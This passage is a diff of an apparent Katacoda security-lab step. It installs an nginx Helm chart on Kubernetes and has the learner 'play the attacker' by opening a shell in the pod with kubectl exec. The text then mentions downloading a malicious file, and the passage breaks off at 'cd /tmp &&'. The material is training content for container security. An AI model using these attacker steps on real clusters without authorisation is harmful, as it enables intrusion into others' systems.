markjacksonfishing/katacoda/secure/secure-lab08/step4.md

 `helm repo add bitnami https://charts.bitnami.com helm install --name example bitnami/nginx`

-You can check that the container is running, and its name by running
+You can check that the container is running, and the name of the pod by running
-`kubectl get po -l app=example-nginx`
+`kubectl get pod -l app=example-nginx`

 Now let's play the attacker, and spawn a shell:
 `kubectl exec -it YOUR_POD_NAME -c example-nginx -- /bin/bash`
+You can get the value of `YOUR_POD_NAME` from the previous command.

+You will be presented with a command prompt similar to this:
+`I have no name!@example-nginx-769dfcf684-l4m67:/app$`

 You can execute a few commands inside the container, or even download some malicious file.
 `cd /tmp &&